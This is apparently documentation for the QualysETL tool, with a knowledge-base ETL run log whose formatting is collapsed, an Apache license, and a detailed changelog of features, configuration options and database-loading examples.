26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|kb_last_modified_afterutc.nowminus7days-2021-05-21T00:00:00Z272021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|hostlistconfig-/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml282021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|host_list_vm_processed_afterutc.nowminus7days-2021-05-27T00:00:00Z292021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|host_list_payload_optionyaml-notags302021-05-2801:26:03,906|INFO|etl_knowledgebase:20210528012603|dgregory|spawn_etl_in_background|JobPID247944kb_etl_workflowjobrunninginbackground.312021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|__start__kb_etl_workflow['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 
20210528012603']322021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|datadirectory:/opt/qetl/users/qualys_user/qetl_home/data332021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|configfile:/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml342021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|credyamlfile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml352021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|cookiefile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cookie362021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_extract_wrapper|startknowledgebase_extractxmlfromqualyswithkb_last_modified_after=2021-05-21T00:00:00Z372021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|start382021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|Foundyoursubscriptioncredentialsfile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml392021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|username:quays93402021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|api_fqdn_server:qualysapi.qg2.apps.qualys.com412021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Warning:EnsureCredentialFilepermissionsarecorrectforyourcompany.422021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Warning:CredentialsFile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml432021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|**Permissionsare:-rw-------for/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml442021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|apicall-https://qualysapi.qg2.apps.qualys.com/api/2.0/fo/knowledge_base/vuln/452021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|apioptions-{'action':'list','details':'All','show_disabled_flag':'1','show_qid_change_log':'1','show_supported_modules_info':'1','show_pci_reasons':'1','last_modified_after':'2021-05-21T00:00:00Z'}462021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|cookie-False472021-05-2801:26:05,717|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-https://qualysapi.qg2.apps.qualys.com/api/2.0/fo/knowledge_base/vuln/size:changetime:482021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.xmlsize:728.51kilobyteschangetime:2021-05-2721:26:05localtimezone492021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|end502021-05-2801:26:05,718|INFO|etl_knowledgebase:20210528012603|dgregory|kb_extract_wrapper|endknowledgebase_extractxmlfromqualys512021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|startkb_shelvexmltoshelve522021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.xml532021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve542021-05-2801:26:05,719|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|start552021-05-2801:26:05,744|INFO|etl_knowledgebase:2021052801
2603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve562021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|countqualysqidaddedtoshelve:137for/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve572021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.xmlsize:728.51kilobyteschangetime:2021-05-2721:26:05localtimezone582021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve592021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone602021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_shelve|end612021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_shelve_wrapper|endkb_shelvexmltoshelve622021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|startkb_load_jsontransformShelvetoJSON632021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve642021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|outputFile:/opt/qetl/users/qualys_user/qetl_home/data/kb.json652021-05-2801:26:05,815|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|start662021-05-2801:26:05,840|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|countqidloadedtojson:137672021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone682021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve692021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.jsonsize:645.81kilobyteschangetime:2021-05-2721:26:05localtimezone702021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_json|end712021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_json_wrapper|endkb_load_jsontransformShelvetoJSON722021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|startkb_load_csv-shelvetocsv732021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve742021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.csv752021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map.csvcve->qidmapincsvformat762021-05-2801:26:05,841|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|start772021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|countrowswrittentocsv:137782021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05l
ocaltimezone792021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve802021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.csvsize:387.65kilobyteschangetime:2021-05-2721:26:05localtimezone812021-05-2801:26:05,864|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_csv_from_shelve|end822021-05-2801:26:05,867|INFO|etl_knowledgebase:20210528012603|dgregory|kb_create_cve_qid_shelve|countrowswrittentocvetoqidshelve:334832021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelvesize:632.00kilobyteschangetime:2021-05-2721:26:05localtimezone842021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_dbm_info|dbmetl_workflow_validation_type-dbm.gnu-/opt/qetl/users/qualys_user/qetl_home/data/kb_shelve852021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map_shelvesize:44.00kilobyteschangetime:2021-05-2721:26:05localtimezone862021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_csv_wrapper|endkb_load_csv-shelvetocsv872021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|startkb_load_cve_qid_csvtransformShelvetoCSV882021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map_shelve892021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_cve_qid_map.csv902021-05-2801:26:05,868|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|Start912021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|CountofCVErowswritten:334922021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_cve_qid_csv_report|End932021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_cve_qid_csv_wrapper|endkb_load_cve_qid_csvtransformShelvetoCSV942021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|startkb_load_sqlitetransformShelvetoSqlite3DB952021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|inputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb.csv962021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to_sqlite_wrapper|outputfile:/opt/qetl/users/qualys_user/qetl_home/data/kb_load_sqlite.db972021-05-2801:26:05,869|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_sqlite|start982021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|bulk_insert_csv_file|Countrowsaddedtotable:137992021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|inputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb.csvsize:387.65kilobyteschangetime:2021-05-2721:26:05localtimezone1002021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|log_file_info|outputfile-/opt/qetl/users/qualys_user/qetl_home/data/kb_load_sqlite.dbsize:520.00kilobyteschangetime:2021-05-2721:26:05localtimezone1012021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_load_sqlite|end1022021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_to
_sqlite_wrapper|endkb_load_sqlitetransformShelvetoSqlite3DB1032021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_distribution_wrapper|startkb_distribution1042021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|kb_dist|start1052021-05-2801:26:05,884|INFO|etl_knowledgebase:20210528012603|dgregory|copy_results_to_external_target|noactionstaken.etld_config_settings.yamlkb_export_dirsetto:default1062021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_dist|end1072021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_distribution_wrapper|endkb_distribution1082021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_end_wrapper|runtimeforkb_etl_workflowinseconds:1.97808016699855221092021-05-2801:26:05,885|INFO|etl_knowledgebase:20210528012603|dgregory|kb_end_wrapper|__end__kb_etl_workflow['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 20210528012603']Review ETL KnowledgeBase Data(qetl_venv)qualysetl@ubuntu:/opt/qetl/users/qualys_user/qetl_home/data$cd/opt/qetl/users/qualys_user/qetl_home/data/(qetl_venv)qualysetl@ubuntu:/opt/qetl/users/qualys_user/qetl_home/data$lskb_sqlite.dbknowledgebase_extract_dir1kb_sqlite.db2kb_utc_run_datetime_2022-01-13T07:29:49Z_utc_last_modified_after_2021-12-14T00:00:00Z_batch_000001.json.gz3kb_utc_run_datetime_2022-01-13T07:29:49Z_utc_last_modified_after_2021-12-14T00:00:00Z_batch_000001.xml.gzLicenseApache LicenseCopyright 2021 David Gregory and Qualys Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.ChangeLogBeginning with 0.6.98 a change log will be maintained here.Version | Date of Change | Description of Changes\n------- | -------------- | ----------------------\n0.6.98 | 2021-08-06 10:00 ET | minor update to order of python virtual env package install. Install Script: qetl_setup_python_venv\n0.6.99 | 2021-08-06 11:30 ET | minor update, added module chardet.\n0.6.100 | 2021-08-10 12:00 ET | minor documentation update.\n0.6.101 | 2021-08-11 12:00 ET | minor update to asset_inventory gateway selection.\n0.6.102 | 2021-08-13 12:00 ET | minor update to documentation.\n0.6.103 | 2021-08-26 18:00 ET | minor update to allow host list detection to continue to run for up to 1 day.\n0.6.104 | 2021-08-27 18:00 ET | update to address encoding error in complex data.\n0.6.105 | 2021-09-09 12:00 ET | updated roadmap, and updated retry after receiving 409 (concurrency) or 202 (duplicate operation), sleep 2 min and retry.\n0.6.106 | 2021-09-29 12:00 ET | Minor update to allow sqlite 3.26.\n0.6.107 | 2021-09-29 20:00 ET | Minor update to adding ability to show tags in Host List. 
If host_list_show_tags: '1' is added to etld_config_settings.yaml, then the host list will include qualys tags.\n0.6.108 | 2021-10-01 20:00 ET | Updated documentation to include Red Hat 8.4 instructions.\n0.6.109 | 2021-10-02 12:00 ET | Updated documentation to include Asset Inventory (GAV/CSAM V2) API.\n0.6.112 | 2021-11-07 12:00 ET | Updated etl_asset_inventory to include new fields: criticality, businessInformation, assignedLocation, businessAppListData. Updated retry and program max run time sanity checks. Updated Asset Inventory Logging to include count of assets prior to executing download. Updated Host List to include cloud meta data. \n0.6.113 | 2021-11-16 12:00 ET | Updated file change sanity check to 20 min of inactivity.\n0.6.117 | 2021-11-18 06:00 ET | Updated http wait time from 30 sec to 5 min. Added counters to asset inventory csv logging. Reverse Sort to add newest assets to shelve in asset_inventory_shelve without overwriting dups.\n0.6.118 | 2021-11-18 06:00 ET | Updated performance reading shelve database in asset inventory process. Tested 1.5 Million hosts successfully.\n0.6.119 | 2021-11-24 06:00 ET | Updated asset inventory features to include presenting JSON in csv cells instead of indexed list, as well as feature to not truncate data. To enable these feature, edit your etld_config_settings.yaml to include 'asset_inventory_present_csv_cell_as_json: True' and edit your etld_config_settings.yaml to include: asset_inventory_csv_truncate_cell_limit: False\n0.6.123 | 2021-12-01 19:00 ET | Part 1) Updated asset inventory features to include tables Q_Asset_Inventory_Software_Assetid (Asset ID to Software) and Q_Asset_Inventory_Software_Unique ( unique list of software and lifecycle info found in asset inventory ). These tables are useful to create views of unique software, unique software -> server.\n0.6.123 | 2021-12-01 19:00 ET | Part 2) Updated qetl_manage_user credential handling to support -p prompt for cred, -s accept json creds from stdin, -m accept creds exported to environment. \n0.6.124 | 2021-12-02 09:00 ET | Minor update to improve exception handling in extract \n0.6.126 | 2021-12-04 19:00 ET | Minor update to help and version options for qetl_manage_user \n0.6.130 | 2021-12-09 12:00 ET | Part 1) Added feature present JSON in csv cells to etl_knowledgebase, etl_host_list, etl_host_list_detection, etl_asset_inventory. To enable these feature, edit your etld_config_settings.yaml to include 'kb_present_csv_cell_as_json: True', 'host_list_present_csv_cell_as_json: True' 'host_list_detection_present_csv_cell_as_json: True', 'asset_inventory_present_csv_cell_as_json: True' \n0.6.130 | 2021-12-09 12:00 ET | Part 2) Added feature \"no truncation\" if truncate cell limit is 0 in etl_knowledgebase, etl_host_list, etl_host_list_detection, etl_asset_inventory. To enable this feature, edit your etld_config_settings.yaml to update: 'asset_inventory_csv_truncate_cell_limit: 0' 'kb_csv_truncate_cell_limit: 0' 'host_list_csv_truncate_cell_limit: 0' 'host_list_detection_csv_truncate_cell_limit: 0'. \n0.6.130 | 2021-12-09 12:00 ET | Part 3) Added feature to allow customers in development to set Python3 requests verify=False. This setting is not recommended as it can result in a man-in-the-middle (MitM) attack. To enable Python3 requests verify=False, edit your etld_config_settings.yaml and add the setting 'requests_module_tls_verify_status: False'. Default is True. When set to False logging will include warning messages about insecurity of the setting. 
We recommend repairing certificate chain instead of setting this option to False. Defaults to True, requiring requests to verify the TLS certificate at the remote end. If verify is set to False, requests will accept any TLS certificate presented by the server, and will ignore hostname mismatches and/or expired certificates, which will make your application vulnerable to man-in-the-middle (MitM) attacks. Only set this to False for testing. \n0.6.130 | 2021-12-09 12:00 ET | Part 4) Minor updates to improve progress counters in logging, minor update to asset inventory logging to include batch number. \n0.6.131 | 2021-12-09 13:00 ET | Minor updates to formatting of ReadMe.\n0.7.6 | 2022-01-12 16:00 ET | Begin 0.7.x series to include major update in performance and updates to db schemas. See below for changes. Please test before replacing 0.6.x series.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 1) All extract data is loaded into their respective extract directories. knowledgebase_extract_dir, host_list_extract_dir, host_list_detection_extract_dir, asset_inventory_extract_dir. All files are gzip compressed.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 2) CSV Files are no longer auto generated. use sqlite3 -csv -header sqlite_file.db \"select * from TABLE_NAME\" > OUTPUTFILE.csv to generate your csv files post process.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 3) All xml files are converted to json files in their respective extract directories.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 4) host_list_detection_sqlite.db schema has been updated. Please review tables to create the views of data you require. Q_Host_List_Detection is now a view of Q_Host_List, Q_Host_List_Detection_HOSTS, and Q_Host_List_Detection_QIDS. Each field in view Q_Host_List_Detection is prefixed with the source of their data ( HL_ = Q_Host_List, HLDH_ = Q_Host_List_Detection_Hosts, HLDQ_ = Q_Host_List_Detection_QIDS. host_list_detection_sqlite.db can be used to update a central database of all historical data post process. \n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 5) host_list_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 6) kb_load_sqlite.db has been renamed kb_sqlite.db\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 7) kb_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 8) asset_inventory_sqlite.db schema has been updated. Please review tables to create the views of data you require.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 9) -e etl_test_system will execute a sampling of all etl programs with the resulting log in log/test_system.log. ERRORS in this log indicate an unhealthy system.\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 10) There is no csv cell truncation as all csv cells with nested data are now json objects instead of flat lists. 
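To illustrate the post-process CSV export referenced in the 0.7.6 notes above (sqlite3 -csv -header sqlite_file.db "select * from TABLE_NAME" > OUTPUTFILE.csv), a minimal Python equivalent might look like the sketch below; the database path and table name are placeholders and should be adapted to your own qetl_home/data layout.

import csv
import sqlite3

# Placeholder path and table name -- adjust to your qetl_home/data layout.
db_path = "/opt/qetl/users/qualys_user/qetl_home/data/kb_sqlite.db"
table_name = "Q_KnowledgeBase"

with sqlite3.connect(db_path) as connection:
    cursor = connection.execute(f"SELECT * FROM {table_name}")
    with open(f"{table_name}.csv", "w", newline="") as csv_file:
        writer = csv.writer(csv_file)
        writer.writerow(column[0] for column in cursor.description)  # header row
        writer.writerows(cursor)                                     # data rows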
\n0.7.6 | 2022-01-12 16:00 ET | changes to 0.7.x series: 11) A new CVE view of knowledgebase is available Q_KnowledgeBase_CVE_LIST.\n0.7.7 | 2022-01-13 10:00 ET | Minor updates to test_system to get 75 hosts.\n0.7.8 | 2022-01-13 15:00 ET | Minor updates to documenation prior to pypi.org launch.\n0.7.9 | 2022-01-14 15:00 ET | Minor updates to documenation.\n0.7.10 | 2022-01-15 02:00 ET | Update to asset inventory workflow to optimize data load.\n0.7.11 | 2022-01-15 14:00 ET | Q_Knowledgebase_CVE_LIST view bug fix.\n0.7.13 | 2022-01-20 19:00 ET | Update to allow for test or prod install of specific qualysetl version. Also, improvements in exception processing across modules and preliminary work on WAS.\n0.7.14 | 2022-01-21 09:00 ET | Updated etl_asset_inventory to ensure gzip compression is default. Update documentation from Red Hat 8.4 to Red Hat 8.5 which is the current 8.x series of Red Hat.\n0.7.15 | 2022-01-21 09:00 ET | Updated help documentation for qetl_setup_python_venv.\n0.7.16 | 2022-02-09 15:00 ET | Updated etl_asset_inventory for GAV only customer processing.\n0.7.17 | 2022-03-25 12:00 ET | Updated etl_asset_inventory enhancements to retry exception processing for malformed json and http error codes.\n0.7.18 | 2022-03-25 12:00 ET | Updated Roadmap\n0.7.19 | 2022-03-26 12:00 ET | Updated retry limits for etl_asset_inventory.\n0.7.20 | 2022-03-27 15:00 ET | Updated etl_asset_inventory auth token refresh.\n0.7.40 | 2022-08-02 18:00 ET | Updated etl_asset_inventory auth token refresh for edge case during maintenance window (http 503). Also, updated Road Map.\n0.7.40 | 2022-08-02 18:00 ET | Updated http_conn_timeout default for all modules to address long running queries.\n0.7.40 | 2022-08-02 18:00 ET | Updated Host List to include ASSET_RISK_SCORE, ASSET_CRITICALITY_SCORE, ARS_FACTORS. Edit etld_config_settings.yaml to include: host_list_payload_option: {'show_ars': '1', 'show_ars_factors': '1'} to enable capturing data. Your subscription must have ARS enabled. Contact your TAM and dgregory@qualys.com if this option does not work for you.\n0.7.40 | 2022-08-02 18:00 ET | Updated Host List Detection to include QDS, QDS_FACTORS Edit etld_config_settings.yaml to include: host_list_detection_payload_option: {'show_qds': '1', 'show_qds_factors': '1'} to enable capturing data. Your subscription must have ARS enabled. Contact your TAM and dgregory@qualys.com if this option does not work for you.\n0.7.41 | 2022-08-30 18:00 ET | Updated Host List Detection to enable host_list_detection_multi_proc_batch_size for values less than 2000 hosts.\n0.7.42 | 2022-08-31 06:00 ET | Updated ulimit for open files to accomdate multiprocessing pipes in host list detection for large jobs.\n0.7.44 | 2022-08-31 11:00 ET | Updated to ensure root user cannot install or execute qualysetl \n0.7.45 | 2022-08-31 21:00 ET | Documention Updates - Asset Inventory Schema Image along with removing old comments from etld_config_settings.yaml template.\n0.7.46 | 2022-09-01 16:00 ET | Add ram, disk, swap, cpu info to logging at beginning of job. \n0.7.47 | 2022-09-02 09:00 ET | Add SYS stat for ram, disk, swap, cpu to logging throughout job run. \n0.7.48 | 2022-09-18 09:00 ET | GAV/CSAM Fields added to SQL Database - domainRole,riskScore,passiveSensor,domain,subdomain,whois,isp,asn. 
\n0.7.48 | 2022-09-18 09:00 ET | GAV/CSAM Documentation of Schema updated with additional fields added to SQL Database: domainRole,riskScore,passiveSensor,domain,subdomain,whois,isp,asn\n0.7.48 | 2022-09-18 09:00 ET | Host List Detection Documentation of Schema updated with additional fields added to SQL Database - Q_Host_List: ASSET_RISK_SCORE, ASSET_CRITICALITY_SCORE, ARS_FACTORS\n0.7.48 | 2022-09-18 09:00 ET | Host List Detection Documentation of Schema updated with additional fields added to SQL Database - Q_Host_List_Detection_QIDS: QDS, QDS_FACTORS\n0.7.49 | 2022-09-19 03:00 ET | Documentation Update minor.\n0.7.50 | 2022-09-19 04:00 ET | Documentation Update minor.\n0.7.51 | 2022-10-05 15:00 ET | Added update to counters in logs, added retest if gateway 401 encountered.\n0.7.56 | 2022-11-04 05:00 ET | Added -e etl_was to qetl_manage_user options to extract WAS Applications, Findings and Catalog.\n0.7.56 | 2022-11-04 05:00 ET | Updated STATUS_TABLE for all modules. STATUS_COUNT renamed LAST_BATCH_PROCESSED, STATUS_DETAILS json updated to include details of which etl workflow updated the table along with workflow log timestamp to correlate the logs with the database update.\n0.7.56 | 2022-11-04 05:00 ET | Updated base64 routine to correct error when processing complex passwords.\n0.8.00 | 2022-12-05 05:00 ET | Major update, be sure to test before going to production.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 1) qetl_manage_user -e etl_was has been added to provide you with Web Application Scanning data including WebApps, Findings and Catalog.\n0.8.00 | 2022-12-05 05:00 ET | Updates: 2) qetl_manage_user -e validate_etl_[etl name] will scan etl_[etl_name] log for errors and report success or fail.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_host_list_detection\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_asset_inventory\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -u /opt/qetl/users/youruser -e validate_etl_was\n0.8.00 | 2022-12-05 05:00 ET | Updates: 3) qetl_manage_user -i -u /opt/qetl/users/[your new qetl user] will automatically initialize user directory without prompting. This is useful when automating run of QualysETL on new systems/docker images as no prompts are provided.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Example: qetl_manage_user -i -u /opt/qetl/users/testuser will automatically create the -u directory structure without prompting. 
\n0.8.00 | 2022-12-05 05:00 ET | Updates: 4) distribution - when enabled, all tables from ETL are prepared for database load.\n0.8.00 | 2022-12-05 05:00 ET | Updates: Edit etld_config_settings.yaml adding the following keys:\n0.8.00 | 2022-12-05 05:00 ET | Updates: - kb_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_detection_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - asset_inventory_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: - was_distribution_csv_flag: True\n0.8.00 | 2022-12-05 05:00 ET | Updates: Tested with the following MySQL options:\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Bash Script Example: \n0.8.00 | 2022-12-05 05:00 ET | Updates: - export TABLE_NAME=QETL.Q_KnowledgeBase\n0.8.00 | 2022-12-05 05:00 ET | Updates: - zcat [Q_KnowledgeBase.*.csv.gz] | mysql -v -e \"LOAD DATA LOCAL INFILE '/dev/stdin' INTO TABLE ${TABLE_NAME} CHARACTER SET UTF8 FIELDS TERMINATED BY ',' ESCAPED BY '\\\\\\\\' LINES TERMINATED BY '\\\\n';COMMIT;\"\n0.8.00 | 2022-12-05 05:00 ET | Updates: The default max_size for each field in distribution is 1000000 characters. To adjust this to meet your database field limits, edit etld_config_settings.yaml and add the following key/value pairs for each etl you want to customize max_field size for in distribution files.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - kb_distribution_csv_max_field_size: 2000000 \n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - host_list_detection_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - asset_inventory_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: - was_distribution_csv_max_field_size: 2000000\n0.8.00 | 2022-12-05 05:00 ET | Updates: For long running jobs etl_host_list_detection and etl_asset_inventory, these both generate distribution files through multiprocessing, so files are prepared for downstream ingestion as they are read from Qualys.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Use this feature to immediately begin streaming Qualys data to your downstream system by inserting distribution files into your downstream system as each batch is created.\n0.8.00 | 2022-12-05 05:00 ET | Updates: - Each distribution file is the product of integrity testing and load to SQLite prior 